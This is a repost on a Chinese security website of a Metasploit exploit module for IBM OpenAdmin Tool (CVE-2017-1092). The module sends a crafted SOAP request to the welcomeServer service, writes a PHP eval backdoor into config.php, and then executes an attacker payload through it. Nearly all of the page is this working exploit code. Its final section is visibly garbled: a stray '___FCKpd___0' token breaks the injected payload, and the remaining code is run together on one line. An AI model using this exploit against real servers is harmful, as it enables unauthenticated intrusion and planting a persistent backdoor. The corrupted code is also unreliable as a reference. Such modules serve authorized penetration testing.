首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution
来源:metasploit.com 作者:Coles 发布时间:2017-08-22  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include REXML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution',
      'Description'    => %q{
        This module exploits an unauthenticated remote PHP code execution
        vulnerability in IBM OpenAdmin Tool included with IBM Informix
        versions 11.5, 11.7, and 12.1.

        The 'welcomeServer' SOAP service does not properly validate user input
        in the 'new_home_page' parameter of the 'saveHomePage' method allowing
        arbitrary PHP code to be written to the config.php file. The config.php
        file is executed in most pages within the application, and accessible
        directly via the web root, resulting in code execution.

        This module has been tested successfully on IBM OpenAdmin Tool 3.14
        on Informix 12.10 Developer Edition (SUSE Linux 11) virtual appliance.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'SecuriTeam', # Discovery and exploit
          'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2017-1092'],
          ['EDB', '42091'],
          ['URL', 'https://www-01.ibm.com/support/docview.wss?uid=swg22002897'],
          ['URL', 'https://blogs.securiteam.com/index.php/archives/3210'],
          ['URL', 'http://seclists.org/fulldisclosure/2017/May/105']
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Privileged'     => false, # Privileged on Windows but not on *nix targets
      'Targets'        => [['Generic (PHP Payload)', {}]],
      'DisclosureDate' => 'May 30 2017',
      'DefaultTarget'  => 0))
    register_options(
      [
        OptString.new('TARGETURI', [ true, 'The base path to IBM OpenAdmin Tool', '/openadmin' ])
      ]
    )
  end

  def set_home_page(homepage)
    xml = Document.new
    xml.add_element 'soapenv:Envelope', 'xmlns:xsi'     => 'http://www.w3.org/2001/XMLSchema-instance',
                                        'xmlns:xsd'     => 'http://www.w3.org/2001/XMLSchema',
                                        'xmlns:soapenv' => 'http://schemas.xmlsoap.org/soap/envelope/',
                                        'xmlns:urn'     => 'urn:Welcome'
    xml.root.add_element 'soapenv:Header'
    xml.root.add_element 'soapenv:Body'
    body = xml.root.elements[2]
    body.add_element 'urn:saveHomePage', 'soapenv:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'
    new_home_page = body.elements[1].add_element 'new_home_page', 'xsi:type' => 'xsd:string'
    new_home_page.text = homepage

    uri = normalize_uri target_uri.path, 'services', 'welcome', 'welcomeService.php'
    send_request_cgi 'method'  => 'POST',
                     'uri'     => uri,
                     'ctype'   => 'text/xml; charset=UTF-8',
                     'headers' => { 'SOAPAction' => 'urn:QBEAction' },
                     'data'    => xml.to_s
  end

  def check
    fingerprint = Rex::Text.rand_text_alpha(rand(10) + 6)
    res = set_home_page "\";##{fingerprint}"

    unless res
      vprint_status "#{peer} Connection failed"
      return CheckCode::Unknown
    end

    if res.code == 200 && res.body =~ %r{<ns1:saveHomePageResponse><return xsi:type="xsd:string">";##{fingerprint}</return>}
      return CheckCode::Detected
    end

    Msf::Exploit::CheckCode::Safe
  end

  def exploit
    cmd_param = Rex::Text.rand_text_alpha(rand(10) + 6)

    res = set_home_page "\";eval(
___FCKpd___0
POST['#{cmd_param}']); #" unless res vprint_status "#{peer} Connection failed" return CheckCode::Unknown end if res.code == 200 && res.body =~ /<ns1:saveHomePageResponse><return xsi:type="xsd:string">";eval/ print_good "#{peer} Wrote backdoor to config.php file successfully" else fail_with Failure::UnexpectedReply, "#{peer} Failed to backdoor config.php" end vprint_status "#{peer} Executing payload..." send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'conf', 'config.php'), 'vars_post' => { cmd_param => payload.encoded } }, 5) print_warning "#{peer} Replace the 'config.php' file with 'BAKconfig.php' to remove the backdoor" end end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Disk Pulse Enterprise 9.9.16 B
·VMware VDP Known SSH Key
·Disk Sorter Enterprise 9.9.12
·Windows Escalate UAC Protectio
·Sync Breeze Enterprise 9.9.16
·Disk Savvy Enterprise 9.9.14 -
·Easy DVD Creator 2.5.11 Buffer
·VX Search Enterprise 9.9.12 -
·MessengerScan 1.05 - Local Buf
·Automated Logic WebCTRL 6.5 -
·DSScan 1.0 - Local Buffer Over
·Easy Video to iPod/MP4/PSP/3GP
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved